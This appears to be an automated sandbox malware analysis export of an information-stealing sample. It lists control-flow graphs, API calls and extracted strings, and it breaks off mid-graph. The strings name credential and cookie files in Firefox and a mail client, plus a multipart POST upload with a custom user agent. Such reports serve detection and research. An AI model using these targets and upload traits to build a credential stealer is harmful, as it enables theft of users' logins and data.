                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat
                                                              • String ID: *576xed$,$/Ext576xedensio576xedns/$\Loc576xedal Extens576xedion Settin576xedgs\$n_v$n_v
                                                              • API String ID: 4038537762-1578839816
                                                              • Opcode ID: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                              • Instruction ID: e5bf92a8c3e4632e865b489cc3d7c979cf6fee557c11a145fed96966642f9e4d
                                                              • Opcode Fuzzy Hash: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                              • Instruction Fuzzy Hash: 5FF1F9B1D006198BCF28DB98889657FBA74EB44300F25463BE506FA3D1D73C9A518F9B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 9a%^$9a%^$9a%^$9a%^$Content-Type: multipart/form-data; boundary=%s$L%$M%$M%$POST$SqDe87817huf871793q74$TeslaBrowser/5.5$winhttp.dll
                                                              • API String ID: 0-485045143
                                                              • Opcode ID: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                              • Instruction ID: c94fe321a93857c184b0378d7fc968df2dfc5883700fbc77eb7b7d771d47b6e9
                                                              • Opcode Fuzzy Hash: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                              • Instruction Fuzzy Hash: 73521DB1E802058BDF288EE89CC56FE7AA1AB58304F24052BE515E6390D77CCDC1979F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5373 40620b-406227 5374 40622d-406235 5373->5374 5375 406237-40623c 5374->5375 5376 40627e-406283 5374->5376 5377 406242-406247 5375->5377 5378 4062ef-4062f4 5375->5378 5379 406289-40628e 5376->5379 5380 40633e-406343 5376->5380 5383 4063e7-4063ec 5377->5383 5384 40624d-406252 5377->5384 5381 406431-406436 5378->5381 5382 4062fa-4062ff 5378->5382 5387 406294-406299 5379->5387 5388 40639b-4063a0 5379->5388 5385 406462-406467 5380->5385 5386 406349-40634e 5380->5386 5397 406615-40661a 5381->5397 5398 40643c-406441 5381->5398 5389 406305-40630a 5382->5389 5390 406596-40659b 5382->5390 5393 4065e1-4065e6 5383->5393 5394 4063f2-4063f7 5383->5394 5391 406543-406548 5384->5391 5392 406258-40625d 5384->5392 5401 40664c-406651 5385->5401 5402 40646d-406472 5385->5402 5395 406354-406359 5386->5395 5396 40648f-406494 5386->5396 5399 4064df-4064e4 5387->5399 5400 40629f-4062a4 5387->5400 5403 406521-406526 5388->5403 5404 4063a6-4063ab 5388->5404 5409 406310-406315 5389->5409 5410 4064c4-4064c7 5389->5410 5429 406750-406762 call 447a80 5390->5429 5430 4065a1-4065a6 5390->5430 5421 40671a-406740 5391->5421 5422 40654e-406553 5391->5422 5425 406263-406268 5392->5425 5426 4067e4-4067fd call 447047 5392->5426 5433 406767-40676e 5393->5433 5434 4065ec-4065f1 5393->5434 5427 406802-40680d lstrcatW call 40b7bb 5394->5427 5428 4063fd-406402 5394->5428 5415 4066f7-406715 5395->5415 5416 40635f-406364 5395->5416 5411 40649a-40649f 5396->5411 5412 4066ae-4066d0 5396->5412 5407 406620-406625 5397->5407 5408 406773-406784 lstrcatW 5397->5408 5431 406825-406840 call 419e6b 5398->5431 5432 406447-40644c 5398->5432 5417 4066e0-4066f2 call 447a80 5399->5417 5418 4064ea-4064ef 5399->5418 5435 406789-4067ad call 404822 5400->5435 5436 4062aa-4062af 5400->5436 5413 406845-40686e 5401->5413 5414 406657-40665c 5401->5414 5405 406478-40647d 5402->5405 5406 40668f-4066a9 5402->5406 5419 406683-40668a 5403->5419 5420 40652c-406531 5403->5420 5423 4063b1-4063b6 5404->5423 5424 4067b2-4067d4 5404->5424 5437 406483-40648a 5405->5437 5438 40695b-406960 5405->5438 5406->5374 5407->5374 5453 40662b-40663c 5407->5453 5408->5374 5454 4068f5-406913 5409->5454 5455 40631b-406320 5409->5455 5443 4064c8 5410->5443 5411->5374 5440 4064a5-4064b0 5411->5440 5458 4066d6-4066db 5412->5458 5459 40691a-40691d 5412->5459 5441 406870 5413->5441 5442 406875-406878 5413->5442 5456 406662-40667e lstrcatW * 2 5414->5456 5457 406968-40696d 5414->5457 5415->5374 5460 40636a-40636f 5416->5460 5461 40687d-4068ac call 404a00 5416->5461 5417->5374 5418->5374 5444 4064f5-40651a 5418->5444 5419->5374 5420->5374 5445 406537-40653e 5420->5445 5421->5459 5463 406746-40674b 5421->5463 5422->5374 5446 406559-406586 call 403ac1 call 404f5e 5422->5446 5464 4068c1-4068c7 5423->5464 5465 4063bc-4063c1 5423->5465 5424->5459 5470 4067da-4067df 5424->5470 5447 4068d9-4068ec call 403c98 5425->5447 5448 40626e-406273 5425->5448 5426->5374 5475 406812-40681c 5427->5475 5467 406922-406943 lstrcatW * 2 5428->5467 5468 406408-40640d 5428->5468 5429->5374 5430->5374 5449 4065ac-4065d1 5430->5449 5431->5374 5472 406452-406457 5432->5472 5473 406948-406956 5432->5473 5433->5374 5434->5374 5450 4065f7-406610 call 447047 5434->5450 5435->5374 5451 4068b5-4068bc 5436->5451 5452 4062b5-4062ba 5436->5452 5437->5374 5438->5374 5486 406966 5438->5486 5440->5449 5477 4064b6-4064be 5440->5477 5441->5442 5442->5374 5443->5443 5479 40658c-406591 5444->5479 5480 40651c 5444->5480 5445->5374 5446->5459 5446->5479 5447->5459 5512 4068ee-4068f3 5447->5512 5448->5374 5485 406275-40627c 5448->5485 5449->5459 5487 4065d7-4065dc 5449->5487 5450->5374 5451->5374 5452->5374 5490 4062c0-4062e4 5452->5490 5453->5459 5491 406642-406647 5453->5491 5454->5459 5484 406915 5454->5484 5455->5374 5492 406326-406339 5455->5492 5456->5374 5457->5374 5488 406973-406991 call 404c9c 5457->5488 5458->5459 5459->5374 5460->5374 5493 406375-406387 call 40b129 5460->5493 5461->5459 5511 4068ae-4068b3 5461->5511 5463->5459 5481 4068cd-4068d4 5464->5481 5465->5374 5495 4063c7-4063d7 5465->5495 5467->5374 5468->5374 5497 406413-40642c lstrcatW * 2 5468->5497 5470->5459 5472->5481 5500 40645d 5472->5500 5473->5374 5475->5442 5501 40681e-406823 5475->5501 5477->5410 5477->5419 5479->5459 5480->5459 5481->5374 5484->5459 5485->5374 5505 406996-4069a0 5486->5505 5487->5459 5488->5505 5508 4062ea 5490->5508 5509 4063dd-4063e2 5490->5509 5491->5459 5492->5374 5514 40638c-406396 5493->5514 5495->5459 5495->5509 5497->5374 5500->5374 5501->5442 5508->5459 5509->5459 5511->5459 5512->5459 5514->5374
                                                              APIs
                                                              • lstrcatW.KERNEL32(?,0045E102), ref: 0040641B
                                                              • lstrcatW.KERNEL32(?,?), ref: 00406423
                                                              • lstrcatW.KERNEL32(?,?), ref: 0040692A
                                                              • lstrcatW.KERNEL32(?,0045E102), ref: 00406934
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat
                                                              • String ID: Ku^%$Ku^%$Y=`$Y=`
                                                              • API String ID: 4038537762-3617128223
                                                              • Opcode ID: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                              • Instruction ID: 9c9fa2152e9cc94146e123e662ad7e189f6101f2fbba187f29f17e96b34d8480
                                                              • Opcode Fuzzy Hash: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                              • Instruction Fuzzy Hash: 72F11AB1D0010A9BCF249E9898815BE7A70AB54304F264D3BE517FA3E4D37CCD619B5B

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5516 42b9c5-42b9ce 5517 42b9d5-42b9dd 5516->5517 5518 42ba34-42ba39 5517->5518 5519 42b9df-42b9e4 5517->5519 5520 42bb28-42bb2d 5518->5520 5521 42ba3f-42ba44 5518->5521 5522 42bad0-42bad5 5519->5522 5523 42b9ea-42b9ef 5519->5523 5528 42bb33-42bb38 5520->5528 5529 42bc20-42bc25 5520->5529 5526 42ba4a-42ba4f 5521->5526 5527 42bb9c-42bba1 5521->5527 5524 42badb-42bae0 5522->5524 5525 42bbcf-42bbd4 5522->5525 5530 42b9f5-42b9fa 5523->5530 5531 42bb59-42bb5e 5523->5531 5532 42bae6-42baeb 5524->5532 5533 42bcdd-42bce2 5524->5533 5538 42bdba-42bdbf 5525->5538 5539 42bbda-42bbdf 5525->5539 5536 42ba55-42ba5a 5526->5536 5537 42bcab-42bcb0 5526->5537 5534 42bba7-42bbac 5527->5534 5535 42bd6e-42bd73 5527->5535 5540 42bb3e-42bb43 5528->5540 5541 42bd0d-42bd12 5528->5541 5544 42bc2b-42bc30 5529->5544 5545 42bdff-42be04 5529->5545 5542 42ba00-42ba05 5530->5542 5543 42bc6c-42bc71 5530->5543 5546 42bd40-42bd45 5531->5546 5547 42bb64-42bb69 5531->5547 5564 42baf1-42baf6 5532->5564 5565 42be9f-42bec5 call 42ad82 5532->5565 5572 42bfd2-42bfe8 5533->5572 5573 42bce8-42bced 5533->5573 5550 42bbb2-42bbb7 5534->5550 5551 42bf39-42bf5c 5534->5551 5552 42bd79-42bd7e 5535->5552 5553 42c02c-42c033 5535->5553 5554 42ba60-42ba65 5536->5554 5555 42be86-42be8f 5536->5555 5568 42bcb6-42bcbb 5537->5568 5569 42bfab-42bfcd call 42b9c5 5537->5569 5558 42bdc5-42bdca 5538->5558 5559 42c038-42c043 5538->5559 5556 42bbe5-42bbea 5539->5556 5557 42c05e-42c084 5539->5557 5570 42bed5-42bef9 5540->5570 5571 42bb49-42bb4e 5540->5571 5576 42bd18-42bd1d 5541->5576 5577 42bfed-42c009 5541->5577 5574 42be21-42be81 call 40e14e * 4 5542->5574 5575 42ba0b-42ba10 5542->5575 5566 42bf87-42bfa6 call 42ca0d 5543->5566 5567 42bc77-42bc7c 5543->5567 5560 42bc36-42bc3b 5544->5560 5561 42bf6c-42bf77 5544->5561 5562 42be0a-42be0f 5545->5562 5563 42c08d-42c0b0 5545->5563 5548 42bd4b-42bd50 5546->5548 5549 42c018-42c027 5546->5549 5578 42bf09-42bf29 5547->5578 5579 42bb6f-42bb74 5547->5579 5548->5517 5603 42bd56-42bd69 5548->5603 5549->5517 5550->5517 5583 42bbbd-42bbca 5550->5583 5581 42c010-42c013 5551->5581 5585 42bf62-42bf67 5551->5585 5552->5517 5604 42bd84-42bdaf call 42b9c5 5552->5604 5553->5517 5554->5517 5605 42ba6b-42bacb call 40e14e * 4 5554->5605 5555->5581 5611 42be95-42be9a 5555->5611 5556->5517 5586 42bbf0-42bc15 call 42ca0d 5556->5586 5596 42c086-42c08b 5557->5596 5597 42c0b7-42c0ba 5557->5597 5558->5517 5606 42bdd0-42bdef call 42b9ae 5558->5606 5593 42c045-42c04d 5559->5593 5594 42c04f 5559->5594 5560->5517 5590 42bc41-42bc61 5560->5590 5561->5581 5587 42bf7d-42bf82 5561->5587 5562->5517 5607 42be15-42be1c 5562->5607 5563->5597 5598 42c0b2 5563->5598 5564->5517 5608 42bafc-42bb11 call 40b7bb 5564->5608 5565->5581 5627 42becb-42bed0 5565->5627 5566->5517 5567->5517 5592 42bc82-42bca6 call 42b9c5 5567->5592 5568->5517 5595 42bcc1-42bcd8 call 447e24 5568->5595 5569->5517 5570->5581 5582 42beff-42bf04 5570->5582 5571->5594 5610 42bb54 5571->5610 5572->5517 5573->5517 5599 42bcf3-42bd08 5573->5599 5574->5517 5600 42ba16-42ba32 call 438e28 5575->5600 5601 42c0bf-42c0c4 5575->5601 5576->5517 5602 42bd23-42bd3b 5576->5602 5577->5581 5591 42c00b 5577->5591 5578->5581 5584 42bf2f-42bf34 5578->5584 5579->5517 5580 42bb7a-42bb97 5579->5580 5580->5517 5581->5517 5582->5581 5583->5517 5584->5581 5585->5581 5586->5584 5638 42bc1b 5586->5638 5587->5581 5590->5585 5617 42bc67 5590->5617 5591->5581 5592->5517 5593->5557 5593->5594 5619 42c050 5594->5619 5595->5517 5596->5597 5597->5517 5598->5597 5599->5517 5600->5517 5601->5517 5622 42c0ca-42c0d9 call 447a80 5601->5622 5602->5517 5603->5517 5604->5585 5640 42bdb5 5604->5640 5605->5517 5606->5581 5642 42bdf5-42bdfa 5606->5642 5607->5517 5646 42bb16-42bb23 5608->5646 5610->5517 5611->5581 5617->5581 5619->5619 5627->5581 5638->5581 5640->5581 5642->5581 5646->5517
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *.CNM$*.PM$*.PMF$*.PML$*.PMN$*.USR$*.WPM$*CACHE.PM$C:\PMAIL$Ku^%$Ku^%$Mail Clients\Pegasus$kernel32.dll
                                                              • API String ID: 0-3904125897
                                                              • Opcode ID: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                              • Instruction ID: 84dac617f37148c4bf89ffca1ba6cb6ddcd73cd34940f6261eccf690c7d83b59
                                                              • Opcode Fuzzy Hash: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                              • Instruction Fuzzy Hash: E0E10BB1F0012A8BCF249E99A88167F7B74EB05354FA4052BE511EB361E77C8D409BDB

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5655 40a928-40a970 call 447047 call 438e28 5661 40a973-40a97b 5655->5661 5662 40a9f5-40a9fa 5661->5662 5663 40a97d-40a982 5661->5663 5664 40aa00-40aa05 5662->5664 5665 40aa93-40aa98 5662->5665 5666 40aa43-40aa48 5663->5666 5667 40a988-40a98d 5663->5667 5668 40aa0b-40aa10 5664->5668 5669 40ab4c-40ab51 5664->5669 5674 40abb7-40abbc 5665->5674 5675 40aa9e-40aaa3 5665->5675 5670 40ab86-40ab8b 5666->5670 5671 40aa4e-40aa53 5666->5671 5672 40a993-40a998 5667->5672 5673 40aaee-40aaf3 5667->5673 5678 40ac20-40ac25 5668->5678 5679 40aa16-40aa1b 5668->5679 5686 40acd4-40acd9 5669->5686 5687 40ab57-40ab5c 5669->5687 5676 40ab91-40ab96 5670->5676 5677 40ad0b-40ad10 5670->5677 5684 40aa59-40aa5e 5671->5684 5685 40ac3b-40ac40 5671->5685 5688 40abfe-40ac03 5672->5688 5689 40a99e-40a9a3 5672->5689 5680 40aca4-40aca9 5673->5680 5681 40aaf9-40aafe 5673->5681 5682 40ad42-40ad47 5674->5682 5683 40abc2-40abc7 5674->5683 5690 40ac73-40ac78 5675->5690 5691 40aaa9-40aaae 5675->5691 5694 40ab9c-40aba1 5676->5694 5695 40af4e-40af66 5676->5695 5692 40ad16-40ad1b 5677->5692 5693 40b0bf-40b0e2 5677->5693 5706 40ac2b-40ac30 5678->5706 5707 40b02e-40b050 lstrcatW lstrlenW 5678->5707 5696 40aa21-40aa26 5679->5696 5697 40adcf-40ae09 call 40b81c call 40a928 5679->5697 5716 40b0b3-40b0ba 5680->5716 5717 40acaf-40acb4 5680->5717 5714 40aeb1-40aee5 5681->5714 5715 40ab04-40ab09 5681->5715 5698 40b0f1-40b101 5682->5698 5699 40ad4d-40ad52 5682->5699 5700 40afb5-40afd9 5683->5700 5701 40abcd-40abd2 5683->5701 5702 40aa64-40aa69 5684->5702 5703 40ae1a-40ae25 5684->5703 5710 40b055-40b075 5685->5710 5711 40ac46-40ac4b 5685->5711 5718 40ae4c-40ae4f 5686->5718 5719 40acdf-40ace4 5686->5719 5720 40ab62-40ab67 5687->5720 5721 40af0a-40af24 5687->5721 5704 40b010-40b029 call 447047 5688->5704 5705 40ac09-40ac0e 5688->5705 5722 40ad73-40ad84 5689->5722 5723 40a9a9-40a9ae 5689->5723 5712 40b084-40b0ae call 438e28 5690->5712 5713 40ac7e-40ac83 5690->5713 5708 40ae90-40aea2 call 40a928 5691->5708 5709 40aab4-40aab9 5691->5709 5692->5661 5724 40ad21-40ad32 5692->5724 5725 40b0e4 5693->5725 5726 40b0e9-40b0ec 5693->5726 5744 40aba7-40abac 5694->5744 5745 40af6b-40af9c NtCreateFile call 438e28 5694->5745 5695->5661 5727 40aa2c-40aa31 5696->5727 5728 40ae0e-40ae15 5696->5728 5697->5661 5698->5661 5699->5661 5729 40ad58-40ad6e call 447047 5699->5729 5700->5661 5749 40abd8-40abdd 5701->5749 5750 40afde-40b007 call 40a928 call 40b129 5701->5750 5732 40ae6d-40ae8b 5702->5732 5733 40aa6f-40aa74 5702->5733 5703->5718 5737 40ae27-40ae2f 5703->5737 5704->5661 5751 40ac14-40ac1b 5705->5751 5752 40b106-40b10b 5705->5752 5753 40ae61-40ae68 5706->5753 5754 40ac36 5706->5754 5707->5661 5735 40aea5-40aeac 5708->5735 5709->5735 5736 40aabf-40aac4 5709->5736 5759 40b077 5710->5759 5760 40b07c-40b07f 5710->5760 5711->5661 5755 40ac51-40ac6e lstrlenW 5711->5755 5712->5661 5713->5661 5756 40ac89-40ac9f call 447047 5713->5756 5714->5726 5746 40aeeb-40aef0 5714->5746 5738 40aef5-40af05 5715->5738 5739 40ab0f-40ab14 5715->5739 5716->5661 5717->5661 5758 40acba-40accf lstrcatW 5717->5758 5740 40ae50 5718->5740 5719->5661 5761 40acea-40acfb 5719->5761 5741 40af33-40af49 call 447047 5720->5741 5742 40ab6d-40ab72 5720->5742 5747 40af26 5721->5747 5748 40af2b-40af2e 5721->5748 5730 40b009-40b00e 5722->5730 5731 40ad8a 5722->5731 5762 40a9b4-40a9b9 5723->5762 5763 40ad8f-40adbf call 40b129 call 40b7bb 5723->5763 5724->5760 5766 40ad38-40ad3d 5724->5766 5725->5726 5726->5661 5727->5661 5767 40aa37-40aa3e 5727->5767 5728->5661 5729->5661 5730->5760 5731->5760 5732->5661 5733->5661 5771 40aa7a-40aa8e 5733->5771 5735->5661 5736->5661 5773 40aaca-40aade 5736->5773 5737->5753 5774 40ae31-40ae47 5737->5774 5738->5661 5739->5661 5775 40ab1a-40ab3c 5739->5775 5740->5740 5741->5661 5742->5661 5776 40ab78-40ab81 5742->5776 5744->5774 5778 40abb2 5744->5778 5796 40afa1-40afb0 5745->5796 5746->5726 5747->5748 5748->5760 5749->5661 5780 40abe3-40abee 5749->5780 5750->5730 5750->5760 5751->5661 5752->5661 5769 40b111-40b118 5752->5769 5753->5661 5754->5661 5755->5661 5756->5661 5758->5661 5759->5760 5760->5661 5761->5760 5785 40ad01-40ad06 5761->5785 5762->5661 5786 40a9bb-40a9e5 5762->5786 5763->5760 5807 40adc5-40adca 5763->5807 5766->5760 5767->5661 5788 40b11a-40b11c 5769->5788 5789 40b11e 5769->5789 5771->5661 5773->5760 5792 40aae4-40aae9 5773->5792 5774->5661 5775->5760 5793 40ab42-40ab47 5775->5793 5776->5735 5778->5661 5780->5760 5795 40abf4-40abf9 5780->5795 5785->5760 5786->5760 5799 40a9eb-40a9f0 5786->5799 5800 40b121-40b128 5788->5800 5789->5800 5792->5760 5793->5760 5795->5760 5796->5661 5799->5760 5807->5760
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,76F90880,?,0040B7CA,0040C9F4,?,?,?), ref: 0040AC5E
                                                              • lstrcatW.KERNEL32(?,\??\,?,?,?,?,?,?,?,?,76F90880,?,0040B7CA,0040C9F4,?,?), ref: 0040ACC2
                                                              Strings
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0040ABA7
                                                              • \??\, xrefs: 0040ACBA
                                                              • ntdll.dll, xrefs: 0040AF92, 0040B092
                                                              • kernel32.dll, xrefs: 0040A947
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcatlstrlen
                                                              • String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$\??\$kernel32.dll$ntdll.dll
                                                              • API String ID: 1475610065-3298706662
                                                              • Opcode ID: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                              • Instruction ID: cf05d70ef52a95d5e776fd44e962e356ae6502797ff445894325f4a97f5a2809
                                                              • Opcode Fuzzy Hash: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                              • Instruction Fuzzy Hash: E302C5B1E443198ADF288A58C842ABFB670EB14310F25493BE515FB3E0D3798D519B9F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5960 42fd35-42fd3e 5961 42fd45-42fd4d 5960->5961 5962 42fdb5-42fdba 5961->5962 5963 42fd4f-42fd54 5961->5963 5964 42fe70-42fe75 5962->5964 5965 42fdc0-42fdc5 5962->5965 5966 42fe25-42fe2a 5963->5966 5967 42fd5a-42fd5f 5963->5967 5968 42ff83-42ff88 5964->5968 5969 42fe7b-42fe80 5964->5969 5970 42ff0a-42ff0f 5965->5970 5971 42fdcb-42fdd0 5965->5971 5974 42ff30-42ff35 5966->5974 5975 42fe30-42fe35 5966->5975 5972 42fec5-42feca 5967->5972 5973 42fd65-42fd6a 5967->5973 5982 4301bf-4301d6 5968->5982 5983 42ff8e-42ff93 5968->5983 5976 42fe86-42fe8b 5969->5976 5977 430095-4300a0 5969->5977 5990 430130-43016d call 42fd35 call 430228 5970->5990 5991 42ff15-42ff1a 5970->5991 5980 42fdd6-42fddb 5971->5980 5981 430004-43002c call 42f278 5971->5981 5984 42fed0-42fed5 5972->5984 5985 4300e4-4300ef 5972->5985 5986 42fd70-42fd75 5973->5986 5987 42ffcc-42ffd3 5973->5987 5978 430195-4301b6 5974->5978 5979 42ff3b-42ff40 5974->5979 5988 430051-430075 call 42f278 5975->5988 5989 42fe3b-42fe40 5975->5989 5993 4300b0-4300d4 5976->5993 5994 42fe91-42fe96 5976->5994 5998 4300a6-4300ab 5977->5998 5999 4301dd-4301e0 5977->5999 5978->5999 6012 4301b8-4301bd 5978->6012 6006 42ff46-42ff78 call 42f278 5979->6006 6007 4301e5-4301ea 5979->6007 6009 42fde1-42fde6 5980->6009 6010 430037-43004c 5980->6010 6027 43018e-430193 5981->6027 6033 430032 5981->6033 5982->5999 6015 4301d8 5982->6015 5983->5961 6011 42ff99-42ffbc 5983->6011 5996 43010a-43012b 5984->5996 5997 42fedb-42fee0 5984->5997 6002 4300f1-4300f9 5985->6002 6003 4300fb 5985->6003 6000 42fd7b-42fd80 5986->6000 6001 42ffd8-42fff9 call 42f278 5986->6001 5987->5961 5988->5961 6013 42fe46-42fe4b 5989->6013 6014 43007a-430090 5989->6014 5990->5999 6049 43016f-430174 5990->6049 6004 42ff20-42ff25 5991->6004 6005 430176-43018c 5991->6005 5993->5999 6020 4300da-4300df 5993->6020 5994->5961 6017 42fe9c-42fec0 call 42fd35 5994->6017 5996->5961 5997->5961 6019 42fee6-42ff05 call 42f278 5997->6019 5998->5999 5999->5961 6000->5961 6021 42fd82-42fd9e call 42f625 * 2 6000->6021 6001->6049 6050 42ffff 6001->6050 6002->5996 6002->6003 6022 4300fc 6003->6022 6004->6003 6023 42ff2b 6004->6023 6005->5999 6005->6027 6006->5998 6047 42ff7e 6006->6047 6007->5961 6031 4301f0-43021b call 42f625 * 3 6007->6031 6009->5961 6026 42fdec-42fe16 6009->6026 6010->5961 6011->5999 6028 42ffc2-42ffc7 6011->6028 6012->5999 6013->5961 6030 42fe51-42fe5c call 42f625 6013->6030 6014->5961 6015->5999 6017->5961 6019->5961 6020->5999 6055 42fda3-42fdb3 6021->6055 6022->6022 6023->5961 6039 42fe18 6026->6039 6040 42fe1d-42fe20 6026->6040 6027->5999 6028->5999 6051 42fe61-42fe6b 6030->6051 6057 430220-430227 6031->6057 6033->5999 6039->6040 6040->5961 6047->5999 6049->5999 6050->5999 6051->5961 6055->5961
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat
                                                              • String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$cert9.db$cookies.sqlite$formhistory.sqlite$key4.db$logins.json$places.sqlite
                                                              • API String ID: 4038537762-2469458786
                                                              • Opcode ID: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                              • Instruction ID: d1eb3a7c9248dbe3af820f863548cf4fb9ed3ca77677979f9304c8b24649e330
                                                              • Opcode Fuzzy Hash: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                              • Instruction Fuzzy Hash: 9FB128B1E1012A97CF288E58A95567F7674AB45300FE4163BE816FB390E73DCA05878B

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6193 4262a1-4262b8 6194 4262bc-4262c4 6193->6194 6195 4262c6-4262cb 6194->6195 6196 426335-42633a 6194->6196 6199 4262d1-4262d6 6195->6199 6200 42638a-42638f 6195->6200 6197 426340-426345 6196->6197 6198 4263f4-4263f9 6196->6198 6203 4264a5-4264aa 6197->6203 6204 42634b-426350 6197->6204 6201 426529-42652e 6198->6201 6202 4263ff-426404 6198->6202 6205 426448-42644d 6199->6205 6206 4262dc-4262e1 6199->6206 6207 4264e3-4264e8 6200->6207 6208 426395-42639a 6200->6208 6223 426534-426539 6201->6223 6224 4266ed-4266f2 6201->6224 6209 426616-42661b 6202->6209 6210 42640a-42640f 6202->6210 6211 4264b0-4264b5 6203->6211 6212 426675-42667a 6203->6212 6213 426356-42635b 6204->6213 6214 4265a4-4265a9 6204->6214 6219 426453-426458 6205->6219 6220 426648-42664d 6205->6220 6215 426582-426587 6206->6215 6216 4262e7-4262ec 6206->6216 6217 4266bb-4266c0 6207->6217 6218 4264ee-4264f3 6207->6218 6221 4263a0-4263a5 6208->6221 6222 4265ea-4265ef 6208->6222 6225 426621-426626 6209->6225 6226 426914-426939 6209->6226 6243 4267d4-4267f3 call 422817 6210->6243 6244 426415-42641a 6210->6244 6227 426847-426862 RtlAdjustPrivilege call 4279e0 6211->6227 6228 4264bb-4264c0 6211->6228 6233 426680-426685 6212->6233 6234 42695e-42696d 6212->6234 6229 426361-426366 6213->6229 6230 4265de-4265e5 6213->6230 6249 4265af-4265b4 6214->6249 6250 4268fc-426903 6214->6250 6247 4268e3-4268f7 6215->6247 6248 42658d-426592 6215->6248 6251 4262f2-4262f7 6216->6251 6252 42670f-426719 6216->6252 6241 426972-42699f call 424c44 call 422177 6217->6241 6242 4266c6-4266cb 6217->6242 6235 4268a4-4268ab 6218->6235 6236 4264f9-4264fe 6218->6236 6253 426824-426836 6219->6253 6254 42645e-426463 6219->6254 6231 426942-426959 6220->6231 6232 426653-426658 6220->6232 6237 42676a-426791 6221->6237 6238 4263ab-4263b0 6221->6238 6255 4265f5-4265fa 6222->6255 6256 426908-42690f 6222->6256 6239 4268c6-4268de 6223->6239 6240 42653f-426544 6223->6240 6245 4266f8-4266fd 6224->6245 6246 4269ae-4269cc call 4279e0 6224->6246 6225->6194 6257 42662c-426643 call 43f000 6225->6257 6268 4269a6-4269a9 6226->6268 6281 42693b-426940 6226->6281 6299 426867-426872 6227->6299 6274 4264c6-4264cb 6228->6274 6275 426877-426894 6228->6275 6258 42673f-42675a 6229->6258 6259 42636c-426371 6229->6259 6230->6194 6231->6194 6232->6194 6260 42665e-426670 6232->6260 6233->6194 6261 42668b-4266ab call 426a42 call 41eba8 6233->6261 6234->6194 6235->6194 6277 4268b0-4268c1 6236->6277 6278 426504-426509 6236->6278 6237->6268 6270 426797-42679c 6237->6270 6262 4267a1-4267c4 6238->6262 6263 